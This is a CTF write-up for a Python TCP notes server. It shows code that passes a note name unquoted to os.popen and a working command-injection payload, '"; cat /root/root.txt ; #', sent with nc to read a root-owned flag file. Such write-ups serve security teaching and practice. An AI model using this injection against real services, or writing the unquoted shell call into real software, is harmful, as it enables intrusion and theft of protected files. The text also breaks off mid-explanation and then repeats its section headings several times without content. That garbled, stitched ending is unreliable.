🛠️ CTF Write‑up – PythonSSS (notes server)

Goal exfiltrate /root/root.txt that is created when the Docker image is built.

1 · Quick Recon

The “server” is a plain TCP menu on port 4444 that lets users create / list / read text notes

inside ./notes.
When a note is read the code executes
```
os.popen(f'cat ./notes/{TreatedFile}')
```
with no quoting at all – any shell metacharacter in TreatedFile

becomes part of the command → command‑injection.

2 · Triggering RCE (the 1‑packet version)

We only need menu option 3 = “Ler Anotação”.

Send a filename that closes the first cat command, runs our own, then comments‑out the rest:

"; cat /root/root.txt ; #

How it looks on the wire:

$ nc target 4444
PythonSuperSecureServer | Desenvolvido por F4, o estagiario.
<https://github.com/RonaldLSB>

1 - Criar uma anotacao
2 - Listar anotacoes Existentes
3 - Ler Anotacao
4 - sair

Escolha uma opcao: 3
Nome da anotacao que deseja ler (Ex: Exemplo): "; cat /root/root.txt ; #

B{flag}

Why it works

The server turns our input into

cat ./notes/"; cat /root/root.txt ; #.txt"

Shell parsing breaks that into

cat ./notes/ (ignored)

🛠️ CTF Write‑up – PythonSSS (notes server)

1 · Quick Recon

2 · Triggering RCE (the 1‑packet version)

Why it works

🛠️ CTF Write‑up – PythonSSS (notes server)

1 · Quick Recon

2 · Triggering RCE (the 1‑packet version)